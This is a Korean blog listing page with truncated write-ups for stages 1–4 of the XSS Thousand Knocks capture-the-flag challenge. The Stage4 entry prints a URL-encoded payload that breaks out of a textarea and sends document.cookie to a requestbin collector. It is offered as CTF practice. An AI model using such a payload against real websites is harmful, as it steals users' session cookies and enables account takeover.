WebHacking/XSS Thousand Knocks Write-Up
-
XSS Thousand Knocks Stage4 write upWebHacking/XSS Thousand Knocks Write-Up 2018. 7. 18. 18:27
여기서 시간 많이 썼다. 문제 3번이랑 비슷한데 똑같이 하면 안된다. 그래서 태그를 닫아서 스크립트를 전달하면 ok가 뜬다. http://2375e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q='> 이렇게 성공. ps. 이거 textarea로 문제 풀 수 있던데, 어떻게 풀리는지 의문이다. http://2375e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q=%22%3E%3C/textarea%3E%3Cscript%3Elocation.href=%27http://requestbin.fullcontact.com/v9x9evv9?a=%27%2Bdocument.cookie%3C/script%3E%3Ctextarea%3E
-
XSS Thousand Knocks Stage3 write upWebHacking/XSS Thousand Knocks Write-Up 2018. 7. 18. 17:28
수천 번의 노크 XSS 단계 3번 write up 링크를 접속하니 Link라는 href가 하나 있고, 접속을 하면 기존과 같게 접속이 된다. 이거 xss game 5번에서 비슷한 문제를 풀어보았기에 비슷하게 하면 된다고 생각을 했음. ?q=' ' 2번과 같이 넣어놓고 link를 누르면 되는거같다!!! 근데 자꾸 404 not found | nginx로 간다... 음 nginx? ** nginx : 아파치 같은 웹서버인듯하다. 한국에서 27%의 점유율을 가지고 있고, 아파치 보다 더 적은 자원으로 더 빠르게 데이터를 서비스 할 수 있는 웹 서버 소프트웨어이다. 페이지 소스 보기를 하면 Link 이렇게 있음을 보게 된다. 그럼 href에서 빠져나와 내가 원하는 스크립트를 실행시키게 해야 되는것같다. http..
-
XSS Thousand Knocks Stage2 write upWebHacking/XSS Thousand Knocks Write-Up 2018. 7. 18. 16:39
링크를 들어가면 아래와 같은 링크로 들어가게 된다. http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q=XSS q=뒤에 있는 내용이 출력되는 기능을 가지고 있는 웹페이지이다. 그래서 아래와 같은 url을 보내보았다. http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q= 그런데 이렇게 보내니까 failed csrf check! 라고 뜨면서 실패가 된다. 고민을 해보다가 +의 문제인거같아서 http encoding하면 나오는 %2B를 넣어서 보내보았다. http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q= 근데 자꾸 ..
-
XSS thousand Knocks stage1 writeupWebHacking/XSS Thousand Knocks Write-Up 2018. 7. 18. 15:18
XSS문제를 더 풀고 싶어서 XSS Thousand Knocks 풀게 됨. https://knock.xss.moe/index 우선 Stage1은 튜토리얼이었는데 어떻게 푸는건지 몰라서 시간이 좀 걸림. 위와 같이 써있는데 서버를 활용해서 XSS 공격을 보낸 후에 서버에 오는 플래그를 읽으면 되는 문제라고 한다. 처음에는 vm 서버를 활용해서 문제를 풀려고 했으나 외부 접속을 막고 있는지 문제가 풀리지 않았다. 그래서 http://requestbin.fullcontact.com을 활용하였다. 해당 문제에 1번에 위와 같이 적어있어서 해당 페이지에 접속해http://8293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe/?location=%22http://examp..